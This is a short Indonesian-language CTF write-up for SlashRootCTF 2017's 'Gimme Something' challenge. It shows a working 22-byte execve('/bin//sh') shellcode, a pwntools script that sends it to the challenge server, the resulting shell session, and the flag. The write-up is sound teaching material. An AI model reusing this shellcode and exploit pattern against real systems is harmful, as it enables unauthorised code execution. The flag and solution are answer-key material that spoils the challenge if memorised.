Gimme Something (100pts)
Something special you can give to me.
Connect: nc 103.200.7.150 7777
Connect: nc 103.200.7.150 7777
f6067d45d9e278f6913f8bddbd74f100
v Deskripsi
Sama dengan soal sebelumnya kita diberikan akses ke server dan sebuah binary
v Penyelesaian
Pertama kita bongkar dengan ida namu ternyata fungsi run_it tidak dapat di psucode kita analisis dengan gdb.
0x08048531 <+100>: call eax
Kecurigaan terjadi pada address tersebut dan bagaimana caranya supaya kita bisa sampe ke address tersebut
0x08048509 <+60>: call 0x80483b0 <strlen@plt>
0x0804850e <+65>: cmp eax,0x16
Dari address diatas panjang inputan kita harus sama dengan 0x16 = 22 berarti kita harus memiliki shell dengan panjang 22 bytes
Mencoba mencari shell di http://shell-storm.org/shellcode kita coba dengan http://shell-storm.org/shellcode/files/shellcode-575.php kita tambahkan 1 bytes nopslide di awal sehingga menjadi
\x90\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80
Kita coba tes langsung ke server
[+] Opening connection to 103.200.7.150 on port 7777: Done
[*] Switching to interactive mode
[x] Welcome to #SlashRootCTF2K17 [x]
Glad to see you here, enjoy the CTF \m/...
$ ls -alh
total 52K
drwxr-x--- 17 0 1000 4.0K Jun 9 09:40 .
drwxr-x--- 17 0 1000 4.0K Jun 9 09:40 ..
-rwxr-x--- 1 0 1000 220 Aug 31 2015 .bash_logout
-rwxr-x--- 1 0 1000 3.7K Aug 31 2015 .bashrc
-rwxr----- 1 0 1000 36 Jun 9 09:29 .flag
-rwxr-x--- 1 0 1000 655 Jun 24 2016 .profile
drwxr-xr-x 2 0 0 4.0K Jun 9 09:40 bin
drwxr-xr-x 2 0 0 4.0K Jun 9 09:40 dev
-rwxr-x--- 1 0 1000 7.3K Jun 9 09:29 gimme_shell
drwxr-xr-x 32 0 0 4.0K Jun 9 09:40 lib
drwxr-xr-x 3 0 0 4.0K Jun 9 09:40 lib32
drwxr-xr-x 2 0 0 4.0K Jun 9 09:40 lib64
$ cat .flag
SlashRootCTF{stairway_to_sHELLcode}
Script pwn kurang lebih seperti ini
from pwn import *
context(arch = 'i386', os = 'linux')
r = remote('103.200.7.150', 7777)
r.send("\x90\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80\n")
r.interactive()
Flag untuk tantangan ini yaitu SlashRootCTF{stairway_to_sHELLcode}
0 comments:
Post a Comment